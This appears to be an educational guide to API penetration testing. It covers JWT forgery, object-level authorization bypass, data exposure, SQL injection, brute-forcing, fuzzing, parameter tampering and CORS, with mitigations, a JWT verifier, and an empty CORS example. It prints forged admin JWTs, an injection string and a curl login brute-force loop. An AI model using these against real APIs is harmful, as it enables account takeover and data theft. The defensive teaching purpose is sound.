API Penetration Testing: Common Vulnerabilities & Exploits
Comprehensive guide to identifying and exploiting vulnerabilities in API endpoints
Introduction to API Penetration Testing
APIs (Application Programming Interfaces) are critical components of modern applications, enabling communication between services. However, their exposure makes them prime targets for attackers. API penetration testing involves identifying and exploiting vulnerabilities to ensure robust security.
Common API Vulnerabilities
1. Broken Authentication
Weak authentication mechanisms allow attackers to impersonate users or gain unauthorized access.
Vulnerability | Example | Risk |
---|---|---|
Weak JWT Validation | alg: none in JWT header | Unauthorized access |
Predictable Tokens | user_id=123 | Account takeover |
Credential Stuffing | Brute-forcing API endpoints | Mass account compromise |
# Original JWT
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJ1c2VyIn0.signature
# Modified JWT (payload changed to role "admin"; original signature no longer matches)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJhZG1pbiJ9.signature
# Bypassing signature validation (header alg set to "none", empty signature)
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJhZG1pbiJ9.
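A server-side verifier that rejects both tampered tokens above, as an added example that is not part of the original guide: it pins the accepted algorithm instead of trusting the token's "alg", and checks the HMAC in constant time. The key and the fixture tokens are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

ALLOWED_ALGS = {"HS256"}  # pinned server-side; the token's own "alg" is never trusted

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(payload: dict, key: bytes) -> str:
    """Issue an HS256 token; used here only to build the fixtures below."""
    head = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{b64url_encode(sig)}"

def verify_jwt(token: str, key: bytes) -> Optional[dict]:
    """Return the payload only if the algorithm is allowed AND the HMAC matches."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    head_b64, body_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(head_b64))
        signature = b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):  # bad base64 or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") not in ALLOWED_ALGS:
        return None  # rejects "none" and any algorithm the server did not configure
    expected = hmac.new(key, f"{head_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):  # constant-time comparison
        return None
    return json.loads(b64url_decode(body_b64))

# Constructed fixtures mirroring the three tokens above (the key is a placeholder).
KEY = b"server-side-secret-placeholder"
ORIGINAL = sign_hs256({"user_id": 123, "role": "user"}, KEY)
HEAD, _, SIG = ORIGINAL.split(".")
ADMIN_BODY = b64url_encode(b'{"user_id":123,"role":"admin"}')
TAMPERED = f"{HEAD}.{ADMIN_BODY}.{SIG}"  # payload edited, old signature kept
NONE_TOKEN = b64url_encode(b'{"alg":"none","typ":"JWT"}') + "." + ADMIN_BODY + "."
```

The header and payload of ORIGINAL encode to the same strings as the original JWT shown above; only the signature differs because the key is a placeholder.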
2. Broken Object Level Authorization (BOLA)
BOLA occurs when an API looks up an object by the identifier the client supplies without checking that the caller is authorized for that specific object, allowing access to other users' resources.
# Request to access another user's data
GET /api/users/456 HTTP/1.1
Host: vulnerable-api.com
Authorization: Bearer user_token_123
# Response (should be forbidden but returns data)
{
"id": 456,
"email": "victim@example.com",
"sensitive_data": "credit_card_info"
}
3. Excessive Data Exposure
APIs may return more data than necessary, exposing sensitive information.
# Request
GET /api/users/123 HTTP/1.1
Host: vulnerable-api.com
# Response (includes sensitive fields)
{
"id": 123,
"name": "John Doe",
"email": "john@example.com",
"password_hash": "hashed_password",
"ssn": "123-45-6789"
}
4. Injection Attacks
APIs that process user input without validation are vulnerable to injection attacks like SQL, NoSQL, or command injection.
# Malicious request
POST /api/search HTTP/1.1
Host: vulnerable-api.com
Content-Type: application/json
{
"query": "1' OR '1'='1"
}
# Response (the injected condition is always true, so every row is returned)
{
"results": [
{"id": 1, "username": "admin", ...},
{"id": 2, "username": "user", ...}
]
}
5. Improper Rate Limiting
Lack of rate limiting allows attackers to brute-force endpoints or cause denial-of-service (DoS).
# Script to brute-force login
for password in $(cat passwords.txt); do
curl -X POST https://vulnerable-api.com/api/login \
-d "{\"username\":\"admin\",\"password\":\"$password\"}"
done
Exploitation Techniques
1. Fuzzing API Endpoints
Fuzzing involves sending unexpected inputs to discover hidden endpoints or vulnerabilities.
ffuf -w wordlist.txt -u https://vulnerable-api.com/api/FUZZ -H "Authorization: Bearer token"
# Common findings: /admin, /debug, /metrics
2. Parameter Tampering
Parameter tampering is the manipulation of query parameters or request bodies to bypass restrictions.
# Original request
GET /api/orders?user_id=123 HTTP/1.1
Host: vulnerable-api.com
# Tampered request
GET /api/orders?user_id=456 HTTP/1.1
Host: vulnerable-api.com
3. Exploiting Misconfigured CORS
Misconfigured Cross-Origin Resource Sharing (CORS) can allow unauthorized domains to access API resources.
# Malicious HTML
Mitigation Techniques
For Developers:
- Implement strong authentication (e.g., OAuth 2.0, JWT with proper validation)
- Enforce object-level authorization checks
- Filter and sanitize all inputs to prevent injection
- Use rate limiting and throttling
- Return only necessary data in responses
- Configure CORS securely
- Regularly audit API endpoints with tools like OWASP ZAP or Burp Suite
For Pentesters:
Test all API endpoints, including undocumented ones. Pay attention to authentication, authorization, and input validation. Use tools like Postman, Burp Suite, or custom scripts for thorough testing.
Conclusion
API penetration testing is critical for securing modern applications. By understanding common vulnerabilities and exploitation techniques, developers and pentesters can build and test robust APIs.